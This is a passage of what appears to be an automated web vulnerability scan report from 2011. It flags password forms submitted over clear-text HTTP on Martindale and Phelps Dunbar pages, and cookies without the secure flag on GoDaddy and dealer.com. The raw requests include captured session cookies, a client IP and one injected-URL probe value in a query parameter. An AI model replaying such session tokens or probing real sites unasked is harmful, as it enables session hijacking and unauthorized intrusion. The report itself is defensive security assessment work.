Cookie: browser_id=4536f10003b84d77a65f457425f341af; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; mdc_session_id=e42928a5acac4e6598b36e4172c30143; refDomain=www.martindale.com; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; __utmb=205508303.2.10.1302961643; MH_survey_MDC64=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93299
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:46:11 GMT; path=/
Date: Sat, 16 Apr 2011 13:51:11 GMT
X-RE-Ref: 1 1935620653
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-4.htm?c=N" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-5.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-5.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:41 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954417277705&InitialSearchId=201104160954417277705; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90695
Connection: close
X-RE-Ref: 1 2145862008
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-5.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-6.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-6.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:42 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954427277709&InitialSearchId=201104160954427277709; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:42 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90561
Connection: close
X-RE-Ref: 1 2147198933
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-6.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-7.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-7.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:43 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954427277440&InitialSearchId=201104160954427277440; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:43 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90154
Connection: close
X-RE-Ref: 1 -2146167431
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-7.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-8.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-8.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:48 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277629&InitialSearchId=201104160954497277629; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90203
Connection: close
X-RE-Ref: 1 -2143880249
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-8.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-9.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers-9.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:47 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954467277737&InitialSearchId=201104160954467277737; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:46 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90518
Connection: close
X-RE-Ref: 1 -2143675582
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-9.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.66. http://www.martindale.com/all/c-england/all-lawyers.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /all/c-england/all-lawyers.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:49 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277746&InitialSearchId=201104160954497277746; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 94106
Connection: close
X-RE-Ref: 1 -2142132339
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:13:13 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 13601

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input type="password" id="pass" name="pass" value="" class="newloginbox-input" />&nbsp;
               <input type="image" name="submit" width="0" >
...[SNIP]...
7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=27854845.703389798.1302905835.1302905835.1302911975.2; fe_typo_user=812d0e9a14

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:11:39 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 14539

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input type="password" id="pass" name="pass" value="" class="newloginbox-input" />&nbsp;
               <input type="image" name="submit" width="0" >
...[SNIP]...
7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:11:50 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 28693

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-srfeuserregister-pi1">
       
<form name="fe_users_form" method="post" action="my-library-log-in/my-library/new-user.html" enctype="multipart/form-data" >
<table border="0" cellspacing="0" cellpadding="1">
...[SNIP]...
<p><input type="password" name="FE[fe_users][password]" size="10" /> Repeat: <input type="password" name="FE[fe_users][password_again]" size="10" /></p>
...[SNIP]...
7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /pages/register_newsletters/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pages/register_newsletters/index.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:12:01 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
Last-Modified: Thu, 15 Jul 2010 21:03:07 GMT
ETag: "316062f-6ab0-4c3f778b"
Accept-Ranges: bytes
Content-Length: 27312
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>

   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

<!--
   This website is powered by TYPO3 -
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="newsletterssubscribe.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input id="pass" name="pass" value="" class="newloginbox-input" type="password">&nbsp;
               <input name="submit" type="image" width="0">
...[SNIP]...
8. SSL cookie without secure flag set  previous  next
There are 20 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

8.1. https://auctions.godaddy.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253878
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hylauhnwszd2e555krb3dw55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
8.2. https://cc.dealer.com/views/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /views/login?loginFailed=true&reseller=3&lang=http://example.com/? HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
